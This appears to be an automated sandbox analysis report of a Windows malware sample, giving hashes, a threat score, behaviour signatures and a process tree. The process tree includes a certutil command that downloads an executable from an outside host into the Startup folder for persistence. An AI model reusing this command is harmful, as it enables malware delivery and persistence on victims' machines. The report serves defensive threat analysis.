Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    30/03/2025, 16:10

General

  • Target

    SecuriteInfo.com.FileRepMalware.24084.17571.exe

  • Size

    672KB

  • MD5

    307b2ab3ca094b94f1a34ef375c8fc30

  • SHA1

    e041ecf2b3466ace266a89ac71155806a42156ae

  • SHA256

    c7ee4281e2017e08f5e2b3c7a4e82a872f0b5eed1ce6f522b14aa9f8e1112155

  • SHA512

    3b9c18e9e2fc461fc4c92b15f2a1c702c41f4a921cb1c31a71aaab1c54eae5c0b88a9aad6bec0a84e20305d58dba8a21894bdf2289ac864d43d8444d32cffd09

  • SSDEEP

    12288:eoh13dewAkpToxgPjMUS9SJl0mYnagLvMdsK2xd6TD366qCs/4AJ5BoIM5QDB7bV:eo/3RI84xHmYamzKF366qCs/4uBeg

Score
5/10

Malware Config

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.FileRepMalware.24084.17571.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.FileRepMalware.24084.17571.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2652
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A8AE.tmp\A8AF.tmp\A8B0.bat C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.FileRepMalware.24084.17571.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2252
      • C:\Windows\system32\certutil.exe
        certutil -urlcache -split -f https://cdn-hsyq-dynamic-file.shanhutech.cn/home/bird/birdpaper_home.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\1000.exe"
        3⤵
          PID:2168

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\A8AE.tmp\A8AF.tmp\A8B0.bat

      Filesize

      1KB

      MD5

      e5a191ad379468540c85e1c2aeacffcf

      SHA1

      0591427ed7f13a7923f628e15ee80ca0af3d99ed

      SHA256

      410ae2e5f22cd9dd9d9ed4b953d37ab55e022c27d0b2bec8523defce425b9de9

      SHA512

      ccd75356b736e4dd09aa5979a86b026af4010574ef87d4f1027e07893e896b60789a18b532d2150d1749ba6e93d9dc21fac97c084c9cce2776c3de4444784e65

    • memory/2652-0-0x0000000000400000-0x00000000004BA000-memory.dmp

      Filesize

      744KB

    • memory/2652-5-0x0000000000400000-0x00000000004BA000-memory.dmp

      Filesize

      744KB